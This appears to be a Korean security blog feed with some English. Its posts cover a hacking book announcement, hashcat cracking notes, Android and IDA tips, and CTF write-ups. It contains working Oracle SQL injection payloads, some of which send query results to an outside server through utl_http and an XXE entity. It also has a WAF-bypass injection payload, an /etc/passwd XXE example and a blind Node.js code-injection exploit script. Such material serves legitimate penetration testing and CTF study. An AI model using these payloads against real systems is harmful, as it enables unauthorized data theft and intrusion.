Hyunmini

[개정판] "윈도우 시스템 해킹 가이드: 버그헌팅과 익스플로잇" 출간 안내

hyunmini — Wed, 4 Dec 2019 23:02:08 +0900

안녕하세요. hyunmini 입니다.

초판이 모두 판매되어 절판되었던 "윈도우 시스템 해킹 가이드: 버그헌팅과 익스플로잇" 개정판이 출간되었습니다!!

2019.12.05 부터 온/오프라인 서점에서 구매 가능합니다.

https://book.naver.com/bookdb/book_detail.nhn?bid=15909324

윈도우 시스템 해킹 가이드 버그헌팅과 익스플로잇

이 책은 윈도우 시스템 해킹을 따라하기 방식으로 쉽게 배우고, 중급자와 보안 엔지니어가실무에서 활용할 수 있도록 구성된 책이다. 시스템 해킹에 입문하는 초보자들은 어렵게만 느껴지는 어셈블리어와 디버거의 벽에 가로막혀서 중도에 포기한다. 그리고 중급자는 적절한 전문 서적과 가이드가 부족해서 시스템 해킹 지식을 넓히는 데 어려움을 겪는다. 또한 실무에서 활용해야 하는 분들은 제대로 된 분석 예제와 기법을 몰라서 이를 찾는 데 시간을 허비한다. 이 책은 이 모

book.naver.com

개정판에서는 크래시 분석 자동화, DBI, Win10 x64 Exploit, 브라우저 Infoleak, OOB Exploit 기술 등 다양한 내용이 약 100여 페이지에 걸쳐서 추가되었습니다.

많이 부족하지만 윈도우 환경에서 초급-중급 시스템 해킹 기술을 공부하는데 도움이 되길 바랍니다.

(개정판 추가 내용)
Section 05. 버그헌팅 자동화
1. 바이너리 분석 자동화
2. Dynamic Binary Instrumentation
3. Taint Analysis
4. Crash 분류 자동화와 중복 제거
5. Code Coverage 높이기

Part 07. 고급 Exploit 기법

Section 01. x64 Exploit
1. x64 의 이해
2. syswow64 exploit
3. windows 10 x64 exploit

Section 02. 웹브라우저 Exploit
1. 웹브라우저 메모리 보호기법
2. CVE 취약점을 활용한 Infoleak
3. Godmode 를 이용한 Exploit

hashcat 간단 정리

hyunmini — Thu, 21 Feb 2019 13:26:12 +0900

가끔 인젝션으로 해쉬값을 빼낸 후 크랙을 해야 할 경우가 있다.

(거의 대부분 데이터베이스에 비밀번호는 해쉬값 또는 암호화 해서 넣어놓기 때문에 사실 거의 필수적으로)

john-the-ripper 를 가장 많이 쓰고 또 유명하지만 간혹 점검 환경에 의해 사용하지 못할수도 있기에 hashcat 도 간략히 정리해둔다.

hashcat 기본

hyunmini@~$ hashcat -h

hashcat - advanced password recovery

Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

- [ Options ] -

Options Short / Long | Type | Description | Example

================================+======+======================================================+=======================

-m, --hash-type | Num | Hash-type, see references below | -m 1000

-a, --attack-mode | Num | Attack-mode, see references below | -a 3

-V, --version | | Print version |

-h, --help | | Print help |

--quiet | | Suppress output |

--hex-charset | | Assume charset is given in hex |

--hex-salt | | Assume salt is given in hex |

...

옵션이 어마어마하게 많기 때문에 가장 중요한 몇가지만 정리해둔다.

-m : 크랙하려는 해시가 어떤 것인지 지정

# | Name | Category ======+==================================================+================================

900 | MD4 | Raw Hash

0 | MD5 | Raw Hash

5100 | Half MD5 | Raw Hash

100 | SHA1 | Raw Hash

1300 | SHA-224 | Raw Hash

1400 | SHA-256 | Raw Hash

...

-a : attack mode, brute/dictionay/hybrid 등

- [ Attack Modes ] -

# | Mode

===+======

0 | Straight

1 | Combination

3 | Brute-force

6 | Hybrid Wordlist + Mask

7 | Hybrid Mask + Wordlist

3 은 무작위 대입, 6은 워드리스트 + 마스크 요 2개 정도가 많이 사용될 듯 하다.

mask 는 문자열 타입을 지정해주는 기능인데, 아래와 같이 미리 지정된 문자열 셋이 있고, 직접 지정해줄 수도 있다.

Charset (mask 지정시 사용)

- [ Built-in Charsets ] -

? | Charset

===+=========

l | abcdefghijklmnopqrstuvwxyz

u | ABCDEFGHIJKLMNOPQRSTUVWXYZ

d | 0123456789

h | 0123456789abcdef

H | 0123456789ABCDEF

s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

a | ?l?u?d?s

b | 0x00 - 0xff

?l?l?l // 소문자로만 이루어진 3개의 글자 - ex: abc, adm, tes,...

?l?l?l?d // 소문자 3글자, 숫자1글자 - ex: abc0, kkk5,...

?l?l?l?l?l?l?l?s // 소문자7글자, 특수문자1글자 - ex: testabc!,...

...

-D : 크랙 연산에 사용할 processing unit 지정(CPU, GPU)

# | Device Type

===+=============

1 | CPU

2 | GPU

3 | FPGA, DSP, Co-Processor

GPU 있다면 2, CPU 면 1 로 지정. 가끔 디바이스가 없다며 에러가 날 때가 있는데, --force 옵션을 추가로 적어주면 그냥 CPU로 지정되는듯 하다.

이외 유용한 옵션들

--pw-min 6 --pw-max 9 // 크랙 시도 문자 길이 지정

경험상 10자리 이상은 일반 PC에서는 크랙이 어려움. 다만 dictionary + brute 라면 어느정도 크랙 가능, 또는 GPU로 돌리면 10자리 정도도 어느정도 크랙 가능

-i --increment-min=4 --increment-min=8 // mask 길이값을 변경해가면서 시도함

사용 예시

# hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a // bruteforce 6 length

# hashcat -m 0 -a 1 hash.lst dict.txt // combine(dictionary + straight ?)

# hashcat -m 1400 -a 6 hash.lst dict.txt ?l?l?l?l?l?l?a?a // hybrid ( dict + brute mask )

이상. 또 필요한 부분이 있으면 정리..

SQL인젝션 - XXE를 이용한 OOB

hyunmini — Fri, 9 Nov 2018 13:10:37 +0900

최근 SQL인젝션을 다양한 방법으로 확장 공격해보고 있는데, XML 함수를 이용하여 마치 XXE 처럼 공격할 수 있는 방법이 있어서 정리해둔다.

BlindSQL 인젝션

ex) 7777 and 1=1 from dual--

OOB (Out of Band)

OOB란 외부 채널로 데이터를 빼내는 방식을 말한다. blind 일때 데이터를 빼내려면 쿼리를 6~7번 해야 겨우 1글자를 알아낼 수 있는 반면, OOB를 이용하면 쿼리1번에 데이터를 다 뽑아올수도 있다. 즉 속도 면에서 Blind 방식 대비 훨씬 빠르다는 장점이 있다.

ex) and 1=(select utl_http.request('http://www.secuholic.com/'||(select user from dual)) from dual) from dual --

이렇게 하면 www.secuholic.com 웹서버에 (select user from dual) 의 결과값인 hyunmini 가 추가된 GET요청을 날리게 되고, 서버에서 웹로그를 확인하면 해당 쿼리의 결과를 확인할 수 있게 되는 원리이다. 같은 원리로 dns 요청을 날리는 방법도 존재한다.

XXE(XML eXternal Entity)

XXE는 몇년 전부터 이슈가 되었던 취약점으로, XML파서를 공격하는 데 주로 사용되는 공격방법이다. 정확히는 external entity 는 원래 있는 기능이고, 이를 악용하면 파일 읽기, 폴더 읽기, SSRF 등 다양한 악성 행위가 가능한 취약점이다.

ex) XXE 예시

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY xxe SYSTEM "file:///etc/passwd">

XXE 를 이용한 SQL인젝션 OOB (SQL인젝션 + XXE)

오라클에서 xmltype 함수를 이용하여 XML 을 사용할 수 있는데 이때 XXE 를 활용할 수 있다. 즉 아래와 같은 방법으로 오라클의 xml parser 에게 외부 서버로 OOB 를 날리도록 하여 쿼리 결과를 받을 수 있다.

7777 and 1=((select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://x.x.x.x/'||(SELECT user from dual)||'">%remote;]>'),'/l') from dual)) FROM DUAL--

결과값을 받을 외부 서버에서)

# python -m SimpleHTTPServer 53

Serving HTTP on 0.0.0.0 port 53 ...

x.x.x.x. - - [09/Nov/2018 10:48:25] code 404, message File not found

x.x.x.x - - [09/Nov/2018 10:48:25] "GET /hyunmini HTTP/1.0" 404 -

위와 같이 GET 요청에 쿼리 결과값이 포함되어 날아오는 것을 확인할 수 있다.

웹해킹은 여전히 심오하다. 끝.

IDA Hexray 문자열이 제대로 보이지 않을때 옵션 설정방법

hyunmini — Thu, 20 Sep 2018 01:09:34 +0900

IDA Hexray

간혹 헥스레이에서 문자열이 "test1234" 대신 atest 요런 식으로 변수명으로 나와서 불편할 때가 있다.

이런 경우 설정방법.

요렇게 문자열 대신 변수명으로 나올때

헥스레이 옵션에서 "Print only constant string literals" 옵션 체크 해제

이제 잘 보인다.

Android 패킷 캡처를 위한 iptables 명령어 정리

hyunmini — Wed, 12 Sep 2018 13:09:37 +0900

안드로이드 패킷 포워딩(burp 등으로)용 iptables 명령어 정리.

보통 proxydroid, autoproxy 등 자동 설정 apk 를 이용하면 되지만 80, 8080, 443이 아닌 경우

리다이렉트가 안되는 경우가 있다. 그런 경우 직접 아래와 같이 iptables 로 세팅해줄 수 있다.

# iptables -F // 전체 삭제

# iptables -L -t nat // nat 리스트

아래는 proxydroid 포트로 리다이렉트 하는 경우.

# iptables -A OUTPUT -t nat -p tcp --dport 10443 -j REDIRECT --to-port 8124

Chain OUTPUT (policy ACCEPT)

target prot opt source destination

REDIRECT udp -- anywhere anywhere udp dpt:domain redir ports 54358

RETURN tcp -- anywhere 192.168.43.187

REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 8123

REDIRECT tcp -- anywhere anywhere tcp dpt:https redir ports 8124

REDIRECT tcp -- anywhere anywhere tcp dpt:5228 redir ports 8124

REDIRECT tcp -- anywhere anywhere tcp dpt:10443 redir ports 8124

Frida 권한 오류 해결

hyunmini — Tue, 11 Sep 2018 15:17:13 +0900

간만에 점검용 폰을 새로 세팅해야 할 일이 있어서 간략히 정리.

# 세팅 순서

- custom recovery 설치, custom rom 설치

- magisk, su 설치(루팅)

- gdb, frida... (점검용 툴들)

다 잘 되다가.. frida 에서 뜬금없이 오류가 떠서 당황..

$ frida-ps -Uai

Failed to enumerate applications: failed to execute child process “/data/local/tmp/re.frida.server/frida-helper-64” (Permission denied)

검색해보니 동일한 오류를 겪은 선구자(?) 들이 있었고 검색 후 해결할 수 있었다.

(삼성계열 폰에서 selinux policy 와 관련해 자식프로세스 생성 시 발생하는 문제라고 하나 정확히 알아보진 않음.)

몇번의 시도 후 성공했는데, 결론적으로 아래와 같이 /system/priv-app 폴더로 복사해주면 해결된다.

$ frida-ps -Uai

PID Name Identifier

----- ---------------------------------------------- -------------------------------------------------

11267 AhnLab V3 Mobile Plus 2.0 com.ahnlab.v3mobileplus

4398 Android Services Library com.google.android.ext.services

6857 BadgeProvider com.sec.android.provider.badge

21975 CMHProvider com.samsung.cmh

4158 CSC com.samsung.sec.android.application.csc

...

잘 됩니다.

xmltype() 함수를 이용한 Oracle Error Based SQL Injection

hyunmini — Wed, 15 Aug 2018 23:30:15 +0900

오랜만의 webhacking 포스팅이다.

This short article is about webhacking.

Oracle Error Based SQL Injection

Oracle Error Based SQL Injection 공격시 주로 utl_inaddr.get_host_name() 함수를 이용한다.

I usually use utl_inaddr.get_host_name() functions when Oracle Error Based SQL Injection.

ex) utl_inaddr.get_host_name( (select user from dual) )

=> 'hyunmini' 호스트를 찾을 수 없습니다.

=> 'hyunmini' host not found.

이번 타겟은 웹방화벽에서 get_host_name 함수를 차단하고 있어서 해당 함수를 사용이 불가능했기에 다른 방법을 찾아보았다.

This Target was blocking the get_host_name function in the WAF, so I tried another way.

조금 찾아보니 역시 다른 방법이 몇가지가 있었다. 이번에 테스트 해본 방법은 xmltype() 함수이다.

After googling, I found some other ways. One way is to use the xmltype() function.

(참고 : https://gist.github.com/xassiz/7aa20b670d7e44da665c3e28f216a927)

(Reference: https://gist.github.com/xassiz/7aa20b670d7e44da665c3e28f216a927)

xmltype()

xmltype() 함수를 이용하면 아래와 같이 데이터를 쉽게 빼올 수 있었다.

Using the xmltype() function, I could easily get the data as shown below.

ex)

vulparam=1 and (select ''||

xmltype('<'||regexp_replace(utl_raw.cast_to_varchar2(utl_encode.base64_encode(

utl_raw.cast_to_raw( (select+global_name+from+global_name) )

))||'%3ax>',chr(10)||'|'||chr(13)||'|%3d',''))||''+from+dual)--

인젝션 결과 : 선언되지 않은 네임스페이스 접두어 'hyunminidb'

injection result : Undeclared namespace prefix 'hyunminidb'

끝!

The End!

Google CTF 2017 ascii art writeup

hyunmini — Wed, 18 Apr 2018 10:23:18 +0900

Google CTF 2017 - ASCII Art Writeup

이번에는 리버싱 문제중 하나인 aart 를 풀어 보았다. 결론부터 말하면 허무하게 풀려버렸다;

이번 문제는 바이너리와 패킷 덤프가 주어졌다.

# file aart_client

aart_client: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=220420b2d90546e195ca6df0119e299f3ad28514, stripped

바이너리를 IDA 로 열어보면 protobuf 관련 클래스가 많이 나오는데, 검색해 보니 객체 등의 다양한 자료들을 송수신 하게 해주는 google 에서 만든 라이브러리이며 게임 등 실무에서도 많이 사용된다고 한다.

패킷을 열어보면 바이너리와 서버가 주고 받은 패킷임을 알 수 있는데, 자세히 보면 내용이 동일한 패킷이 주기적으로 보내진 것을 알 수 있다. 아마도 바이너리의 HELLO 문자열과 관련된 패킷일 것으로 생각된다.

즉 HELLO -> Message 전송의 형식으로 통신을 한 것으로 볼 수 있다.

처음엔 바이너리를 좀 분석하다가... 실행하려면 서버가 필요해서 웹서버를 만들어서 시뮬레이션(?) 해 보기로 했고, 아래와 같이 간단히 코딩하여 소켓으로 응답을 돌려줬다.

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import SocketServer

seq = 0

msg_0 = '''787e7f756d667e7c7c15787e70746d667e7c232b4c5c57405554435d5851555b5549505a554e405b545c4f51405c545b4f5449432b193931'''

msg_1 = '''54795e5e2c5d2c2c2c2c2c2c2c2c5e5d135e53535353535353535479535d2f532c5d2c2c2c2c2c2c2c2c5c5d5353135d5353535353535479535d53535353532f5353535353535353535c53535353135d535353535c795353535c53535353532f535353535353535c53535353532f2f5353537953530f53535353535353532f535e545e5e5c1353535353535353535353530f79534e5d5e5e5e5e0d0d0d0d5c0d535353532f530d0d0d0d5e0d5e5e4e5e535d7953492e4949494949490f4953532c5a535b0f5349494949494949495328535354795e4e5e5e5d5e2c2c2c2c532f505353532c5c2c2c5d2c5e5e5e5e134e53530f7953535e0d2c5d5353532f58535e5e585e535353535353535353530f53535354795d5e532c53530d535d5e5c53530f53532f0f535353535353535c5c5353537953530f5d535e542c5d53535c530f5353530f532f534e54134e53535d0d535353530f7953530f530d5d53535c535353530f5353530f2f532c2c0d535c5d535353537953530f53532f0f5d535e5e530d0f5353530f5353535e0d5d5e5c535353535353532f795c2c5353532f53532c530f2c53530f532c2c53535353535c5353535353532c7953535353532f53535353530f5353530f53535353535c53535353535379532f2f53530f0f2c2c0f2c530f5c53535c53535353535353532f79532f0f0f53530f53530f5c5c535353535353535353532f790f2f530f53530f0f5c5c5353535353535353535379532c2f530f53532c0f535c535353535353535353537953532c53535353532c5353535353535353535353537979b97716690a061e1d171f1b091112031f101f041a111f160a1b1e1605110a1e1e0905530370617b'''

msg_2 = '''787e7f756d667e7c7c15787e70746d667e7c232b4e564150525b5d5e57504b5e48405558534158505141494a564d515848564b562b193931'''

msg_3 = '''037e6c612e496c67446c3c2e7168746c772e6c6c2e65667a6d686e6c652e2e6c6c772e6f2e6262702e746277576b457840571931746c7b6a686167646d6a7164727a6f62697b626a6b7b73706c776b62726c716c11230b7a'''
msg_4 = '''787e7f756d667e7c7c15787e70746d667e7c232b53545f485c515349545449564e4f4f554353485a4d504e4d50404d545c5c514f2b193931'''

msg_5 = '''54795e5e2c5d2c2c2c2c2c2c2c2c5e5d135e53535353535353535479535d2f532c5d2c2c2c2c2c2c2c2c5c5d5353135d5353535353535479535d53535353532f5353535353535353535c53535353135d535353535c795353535c53535353532f535353535353535c53535353532f2f5353537953530f53535353535353532f535e545e5e5c1353535353535353535353530f79534e5d5e5e5e5e0d0d0d0d5c0d535353532f530d0d0d0d5e0d5e5e4e5e535d7953492e4949494949490f4953532c5a535b0f5349494949494949495328535354795e4e5e5e5d5e2c2c2c2c532f505353532c5c2c2c5d2c5e5e5e5e134e53530f7953535e0d2c5d5353532f58535e5e585e535353535353535353530f53535354795d5e532c53530d535d5e5c53530f53532f0f535353535353535c5c5353537953530f5d535e542c5d53535c530f5353530f532f534e54134e53535d0d535353530f7953530f530d5d53535c535353530f5353530f2f532c2c0d535c5d535353537953530f53532f0f5d535e5e530d0f5353530f5353535e0d5d5e5c535353535353532f795c2c5353532f53532c530f2c53530f532c2c53535353535c5353535353532c7953535353532f53535353530f5353530f53535353535c53535353535379532f2f53530f0f2c2c0f2c530f5c53535c53535353535353532f79532f0f0f53530f53530f5c5c535353535353535353532f790f2f530f53530f0f5c5c5353535353535353535379532c2f530f53532c0f535c535353535353535353537953532c53535353532c5353535353535353535353537979b9771e6902191b1503161e191c1e05031f04190510091a0207070a041e1a16070516531b70617b'''

msgs = [msg_0, msg_3, msg_2, msg_1, msg_4, msg_5]

class S(BaseHTTPRequestHandler):
    def _set_headers(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        self._set_headers()
        self.wfile.write("<html><body><h1>hi!</h1></body></html>")

    def do_HEAD(self):
        self._set_headers()

    def do_POST(self):
        # Doesn't do anything with posted data
        global seq
        self._set_headers()
        print self.rfile.read(int(self.headers['Content-Length']))
        self.wfile.write(msgs[seq])
        seq += 1

def run(server_class=HTTPServer, handler_class=S, port=80):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print 'Starting httpd...'
    httpd.serve_forever()

if __name__ == "__main__":
    from sys import argv

    if len(argv) == 2:
        run(port=int(argv[1]))
    else:
        run()

그러자... 아스키 비행기가 나왔다.

# ./aart_client 127.0.0.1

_ _

/_| |_\

//|| ||\\

// || || \\

// ||___|| \\

/ | | \ _

/ __| |__ \ /_\

/ .--~ | | ~--. \| |

/.~ __\ | | / ~.| |

.~ `=='\ | | / _.-'. |

/ / \| |/ .-~ _.-'

| +---+ \ _.-~ |

`=----.____/ # \____.----='

[::::::::| (_) |::::::::]

.=----~~~~~\ /~~~~~----=.

| /`---'\ |

\ \ / \ / /

`. / \ .'

`. /._________.\ .'

`--._________.--'

그리고...몇번 더 실행해보니 플래그가 나왔다 -_-;;;;;

# ./aart_client 127.0.0.1

CTF{That-was-a-lot-of-monkey-foot-work?-Good-Job!}

다른 풀이를 찾아보니 이건 꼼수고.. 제대로 된 풀이는 protobuf 프로토콜을 분석해서 flag 헥스값을 디코딩해서 키를 추출하는 식이었다. 어쨌든 풀었으니 이건 다음에 -_-;

google ctf 2017 - food.apk Writeup

hyunmini — Tue, 10 Apr 2018 16:29:45 +0900

Google CTF 2017 - Fook.apk Writeup

끝난지 좀 됐지만 공부겸 google ctf 2017 의 문제중 안드로이드 문제인 food.apk 를 풀어봤다.

주어진 apk 는 정상 실행이 안되어서 정적 분석을 먼저 해 보았는데, 실행되고 바로 libcook.so 라이브러리를 호출해 주고 있었고 별다른 코드가

보이지 않았다.

so 파일을 들여다 보면 아래와 같이 dex 파일을 새롭게 생성해 주는 것을 볼 수 있다.

하지만 해당 파일을 바이너리에서 복사해서 붙여넣고 디컴파일을 시도하면 가장 중요한 함수인 cc() 함수가 제대로 보이지 않는다.

so 를 다시 살펴보면 마지막 부분에서 아래와 같이 특정 부분을 xor 해주는 것을 볼 수 있다.(0x720 오프셋 부터 0x90 byte)

해당 바이트를 가져와서 0x5a 로 xor 해서 원본 코드를 확인해 보자. python 으로 간단히 만들어 줬다.

그 후 뽑아냈던 dex 파일의 0E 로 채워진 부분들(0x720 오프셋) 을 위에서 xor 한 값으로 채워주고 다시 디컴파일을 해 보면 정상적으로 cc() 함수가 보인다.

cc() 함수. 어떤 입력값을 비교한 후 맞으면 flag 를 출력해준다. 굳이 실행시킬 필요없이 flag 출력함수인 R.C() 를 분석하기만 하면 flag 를 추출할 수 있다.

# R.C 인데..약간 복잡하긴 하지만 상관없다. 그대로 갖다 쓰면 되니까 ㅎ

라고 생각하고 파이썬으로 대강 작성한 후에 돌려봤더니 아래처럼 일부 플래그만 나오는 이상한 현상이 발생했다(ㅠㅠ)

�TF{�aco��l�ttu��_��to_l�bst��

몇번의 삽질을 한 후 찾은 버그는 바로 자바 소스에서 (byte) 캐스트 때문에 char 형으로 강제 형변환이 되면서 발생한 문제였다.

파이썬과 약간 처리 방식이 다른듯 했다. 결국 % 256 연산을 통해 음수가 나오지 않도록 해주니 제대로 나왔다. 아래는 전체 python 소스이다.

# solve_food2.py

print "[*] google ctf 2017 : food.apk "

print "[*] get this.k array.."

flag = [ -19, 116, 58, 108, -1, 33, 9, 61, -61, -37, 108, -123, 3, 35, 97, -10, -15, 15, -85, -66, -31, -65, 17, 79, 31, 25, -39, 95, 93, 1, -110, -103, -118, -38, -57, -58, -51, -79 ]

compareArr = [0x13, 0x11, 0x13, 0x03, 0x04, 0x03, 0x01, 0x05]
bArr = [26,27,30,4,21,2, 18, 7]

for i,c in enumerate(compareArr):
    print hex(c^bArr[i])

# 0x9 0xa 0xd 0x7 0x11 0x1 0x13 0x2
this_k = [0x9, 0xa, 0xd, 0x7, 0x11, 0x1, 0x13, 0x2]
this_k = [9,10,13,7,17,1,19,2]

print "[*] get Flag!"

def r_c(arr1, arr2):
    v7 = 256    
    v3 = [None]*v7
    v4 = [None]*v7
    v0 = 0
    v1 = 0
    while v1 != v7:
        v3[v1] = v1
        v4[v1] = arr2[v1 % len(arr2)]
        v1 += 1

    v2 = v1^v1
    v1 = 0
    while v2 != v7:
        v1 = v1 + v3[v2] + v4[v2] & 255
        v3[v1] = (v3[v1]^v3[v2])  % 256 
        v3[v2] = (v3[v2]^v3[v1])  % 256
        v3[v1] = (v3[v1]^v3[v2])  % 256
        v2 += 1

    v4 = ""
    v2 ^= v2
    v1 ^= v1

    while v0 != len(arr1):
        v2 = v2 + 1 & 255
        v1 = v1 + v3[v2] & 255
        v3[v1] = (v3[v1]^v3[v2]) % 256
        v3[v2] = (v3[v2]^v3[v1]) % 256
        v3[v1] = (v3[v1]^v3[v2]) % 256
        v4 += chr((arr1[v0] ^ v3[v3[v2] + v3[v1] & 255]) % 256)
        v0 += 1

    return v4

print r_c(flag, this_k)

실행해보면 flag 를 확인할 수 있다.

hyunmini@~/2017.googlectf/food$ python food_flag2.py

[*] google ctf 2017 : food.apk

[*] get this.k array..

0x9

0xa

0xd

0x7

0x11

0x1

0x13

0x2

[*] get Flag!

CTF{bacon_lettuce_tomato_lobster_soul}

끝! (ps. 간만의 안드로이드 리버싱 문제라서 반가웠다.)

0ctf 2018 - LoginMe Writeup

hyunmini — Tue, 10 Apr 2018 14:21:20 +0900

0CTF2018 - LoginMe

참가는 못했지만 나중에 접속해서 0ctf 2018 문제중 하나인 LoginMe 를 풀어보았다.

I didn't participate but I tried to solve LoginMe which is one of 0ctf 2018 tasks.

https://ctf.0ops.sjtu.cn/login#task-28

웹 로그인 창 하나가 주어지고, 소스코드도 주어졌다.

web login window is given, and the source code is given.

# loginme.js

var express = require('express')
var app = express()

var bodyParser = require('body-parser')
app.use(bodyParser.urlencoded({}));

var path    = require("path");
var moment = require('moment');
var MongoClient = require('mongodb').MongoClient;
var url = "mongodb://localhost:27017/";

MongoClient.connect(url, function(err, db) {
    if (err) throw err;
    dbo = db.db("test_db");
    var collection_name = "users";
    var password_column = "password_"+Math.random().toString(36).slice(2)
    var password = "xxxxxxxxxxxxxxxxxxxxxx";
    // flag is flag{password}
    var myobj = { "username": "admin", "last_access": moment().format('YYYY-MM-DD HH:mm:ss Z')};
    myobj[password_column] = password;
    dbo.collection(collection_name).remove({});
    dbo.collection(collection_name).update(
        { name: myobj.name },
        myobj,
        { upsert: true }
    );

    app.get('/', function (req, res) {
        res.sendFile(path.join(__dirname,'index.html'));
    })
    app.post('/check', function (req, res) {
        var check_function = 'if(this.username == #username# && #username# == "admin" && 
         hex_md5(#password#) == this.'+password_column+'){\nreturn 1;\n}else{\nreturn 0;}';

        for(var k in req.body){
            var valid = ['#','(',')'].every((x)=>{return req.body[k].indexOf(x) == -1});
            if(!valid) res.send('Nope');
            check_function = check_function.replace(
                new RegExp('#'+k+'#','gm')
                ,JSON.stringify(req.body[k]))
        }
        var query = {"$where" : check_function};
        var newvalue = {$set : {last_access: moment().format('YYYY-MM-DD HH:mm:ss Z')}}
        dbo.collection(collection_name).updateOne(query,newvalue,function (e,r){
            if(e) throw e;
            res.send('ok');
            // ... implementing, plz dont release this.
        });
    })
    app.listen(8081)

});

코드를 보면 node js 의 웹 프레임워크인 express 를 이용한 웹 서버임을 알 수 있다. 코드중 중요한 부분은 아래와 같다.

web server using express module, the web framework of node js. An important part of the code is:

1) password 칼럼명이 랜덤하게 바뀜

password column name changes randomly

ex)

this.password_qqxnativaup

this.password_kt1g716pi4

2) 내가 입력한 request 변수와 값을 이용해서 nodejs 코드가 동적으로 만들어진 후 실행됨

nodejs code is dynamically created and executed using the request variable and value I entered

  for(var k in req.body){
            var valid = ['#','(',')'].every((x)=>{return req.body[k].indexOf(x) == -1});
            if(!valid) res.send('Nope');
            check_function = check_function.replace(
                new RegExp('#'+k+'#','gm')
                ,JSON.stringify(req.body[k]))

ex) (POST) username=admin&password=123 로 전송하면 아래와 같이 동적으로 구문을 만들어줌

send "username=admin&password=123", server dynamically generates the code as shown below.

- for 문을 돌면서 차례대로 #username# => admin, #password# => 123 으로 입력

after running for loop, #username# => admin, #password# => 123

k:username

if(this.username == "admin" && "admin" == "admin" && hex_md5(#password#) == this.password_qqxnativaup){

return 1;

}else{

return 0;}

k:password

if(this.username == "admin" && "admin" == "admin" && hex_md5("123") == this.password_qqxnativaup){

return 1;

}else{

return 0;}

결론적으로 입력값에 # 을 삽입하면 저 구문을 꼬이게 할 수 있다는 뜻이다.

In conclusion, it's possible inserting '#' in the input value to attack.

하지만 소스상에서 #, ), ( 문자는 아래 소스코드에 의해 필터링이 되고 있다.

but #, ), ( characters are filtered by the source code below.

var valid = ['#','(',')'].every((x)=>{return req.body[k].indexOf(x) == -1});

이 필터링은 배열로 값을 보내면 우회가 가능하다. ( username[] = 123 )

filter can be bypassed by sending an array instead of a value.

다양한 삽질 끝에 아래와 같은 방식으로 SQLi 처럼 Blind 방식의 node js 코드 인젝션이 가능함을 확인했다.

After various attempts, I confirmed that node.js code injection of blind method like SQLi is possible in the following way.

True:

username[]=admin#test&test.*md5.[]=] || 'a'=='a' ? 1 : alert() || (#pass&pass.*=test&password=555

False:

username[]=admin#test&test.*md5.[]=] || 'a'=='b' ? 1 : alert() || (#pass&pass.*=test&password=555

참일 때는 에러가 나지 않도록 하고, 거짓일 때는 alert(없는 메소드라고 에러발생) 을 이용해서 에러를 발생시켰다.

If true no error, if false an error is output.

아래처럼 입력한 자바스크립트 구문이 참일 때만 ok 가 오고, 거짓일땐 서버 에러가 발생해서 응답이 오지 않는다.

It only be 'ok' if the JavaScript syntax is true, and if it is false, get a server error and no response.

이제 스크립트를 작성해서 플래그를 한글자씩 뽑아오면 끝!

Now, write a simple python script and get the flags one by one!

# exploit_loginme.py

#!/usr/bin/python
from socket import *
import time

#target = ('202.120.7.194', 8081)
target = ('127.0.0.1', 8081)


def request(p):
    c = socket(AF_INET, SOCK_STREAM)
    try:
        c.connect(target)
    except:
        time.sleep(0.2)
        c.connect(target)

    req = '''POST /check HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Length: {}
Host: 127.0.0.1:8081
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

{}

'''.format(len(p)+2,p)
    #print req
    c.send(req)
    res = c.recv(300)
    #print res
    try:
        t = res.index('ok')
        return True
    except:
        return False

### flag length - 32
#param = 'username[]=admin#test&test.*md5.[]=] || this[Object.keys(this)[3]].length == 32 ? 1 : alert() || (#pass&pass.*=test'
#print request(param)

### flag
flag = ''
for i in range(32):
    for j in range(48,127):
        param = 'username[]=admin#test&test.*md5.[]=] || this[Object.keys(this)[3]].substr({},1).charCodeAt() == {} ? 1 : alert() || (#pass&pass.*=test'.format(i,j)
        print "[*] trying.." + param
        if request(param):
            print '\n=================='
            print chr(j)
            flag += chr(j)
            print '\n=================='
            break
        time.sleep(0.4)

print "[+] flag: \nflag{" + flag + "}"

끝!

the end!

ps. node js 를 CTF 때만 간혹 보고 거의 안써봐서 조금 헷갈렸던 문제였다..공부해야지!